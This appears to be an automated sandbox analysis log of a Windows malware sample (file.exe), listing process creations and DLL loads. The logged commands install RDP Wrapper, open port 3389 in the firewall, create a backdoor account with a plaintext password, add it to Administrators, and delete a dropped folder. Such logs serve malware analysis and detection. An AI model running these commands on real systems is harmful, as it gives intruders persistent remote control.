Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EBAAFCAFCBKF" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_2490c46d /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_2490c46d /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_2490c46d /add
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EBAAFCAFCB.exe "C:\ProgramData\EBAAFCAFCB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECGDBFCBK.exe "C:\ProgramData\KECGDBFCBK.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\JKEHIIJJEC.exe "C:\ProgramData\JKEHIIJJEC.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EBAAFCAFCBKF" & exit	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\JKEHIIJJEC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_2490c46d ToN8BxpWb7YJ /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_2490c46d /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_2490c46d /add

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EBAAFCAFCB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KECGDBFCBK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: version.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: wldp.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: amsi.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: userenv.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: profapi.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: rasman.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\JKEHIIJJEC.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: wininet.dll
